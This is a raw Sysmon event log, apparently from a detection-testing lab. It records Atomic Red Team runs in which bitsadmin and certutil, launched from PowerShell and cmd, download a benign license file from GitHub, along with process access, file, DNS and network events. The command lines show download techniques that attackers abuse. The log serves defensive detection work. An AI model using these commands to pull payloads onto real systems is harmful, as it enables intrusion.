21:49:24.377{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E4-605B-6E69-00000000AE01}7500C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01f5|UNKNOWN(00007FFA6D95C033) 10341000x80000000000000005917227Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.375{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917226Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.375{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917225Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.375{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917224Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.375{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917223Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.374{896A638B-B8DD-6058-9202-00000000AE01}36323472C:\Windows\system32\csrss.exe{896A638B-B3E4-605B-6E69-00000000AE01}7500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917222Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.374{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E4-605B-6E69-00000000AE01}7500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af43b9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3aaaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+afe7b349(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af37009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3d3b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b59b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3a66d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3e2d74(wow64) 154100x80000000000000005917221Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.365{896A638B-B3E4-605B-6E69-00000000AE01}7500C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt %%temp%%\Atomic-license.txt" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000005917220Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.364{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-24 21:49:22.186 11241100x80000000000000005917219Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.363{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-24 21:49:22.185 23542300x80000000000000005917218Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.328{896A638B-FBAD-6058-BE11-00000000AE01}4492ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=F6F6624CE0680F9545713E2B0AB09A15,SHA256=9F13EDBE4F9D57EED7B9609D64BB0482635610FCB29F765E7188FBC6DF646F68,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000005917217Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:20.976{00000000-0000-0000-0000-000000000000}2208raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.110.133;::ffff:185.199.109.133;<unknown process> 23542300x80000000000000005917216Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.273{896A638B-B3E2-605B-6C69-00000000AE01}6204ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917215Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.152{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B3E4-605B-6D69-00000000AE01}6268C:\Windows\system32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917214Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.152{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B3E4-605B-6D69-00000000AE01}6268C:\Windows\system32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917213Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.136{896A638B-B5CB-6058-1600-00000000AE01}13087204C:\Windows\System32\svchost.exe{896A638B-B3E4-605B-6D69-00000000AE01}6268C:\Windows\system32\certutil.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917212Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.136{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B3E4-605B-6D69-00000000AE01}6268C:\Windows\system32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917211Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.118{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E4-605B-6D69-00000000AE01}6268C:\Windows\system32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917210Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.115{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917209Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.115{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917208Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.115{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917207Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.115{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917206Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.115{896A638B-B8DD-6058-9202-00000000AE01}36323472C:\Windows\system32\csrss.exe{896A638B-B3E4-605B-6D69-00000000AE01}6268C:\Windows\system32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917205Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.114{896A638B-B3E2-605B-6C69-00000000AE01}62044652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E4-605B-6D69-00000000AE01}6268C:\Windows\system32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af7efff4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec7347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec730b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af73b3b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec3002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec93a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec75aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec75aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec7593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec6665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec73b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec73710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec7347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec730b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af73b3b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec3002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aec93a9c(wow64) 154100x80000000000000005917204Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.114{896A638B-B3E4-605B-6D69-00000000AE01}6268C:\Windows\System32\certutil.exe10.0.14393.4169 (rs1_release.210107-1130)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.exe"C:\Windows\system32\certutil.exe" -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txtC:\Users\Administrator\AppData\Local\Temp\2\certutil-2021_03_24\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=BF7CEA72AE186A10239F830F93492A73,SHA256=A50DFE408565C2BB011D013AC43E616B2A595B1D06EB9B083F519672732498DA,IMPHASH=442218E88D4D6AA0BE3165DD7B20A4C4{896A638B-B3E2-605B-6C69-00000000AE01}6204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$datePath = \""certutil-$(Get-Date -format yyyy_MM_dd)\"" New-Item -Path $datePath -ItemType Directory Set-Location $datePath certutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Get-ChildItem | Where-Object {$_.Name -notlike \""*.txt\""} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }} 23542300x8000000000000000638430Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:25.898{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE7A7BBFE39E9196C1F371F5C29D0B38,SHA256=5F21A4889058BB1B5A5848A9A31DDC11A7B1666B9BD90AFD801EA7A838E4E9F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917274Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.188{896A638B-B5C0-6058-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1489-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local47001- 354300x80000000000000005917273Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.188{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exeNT 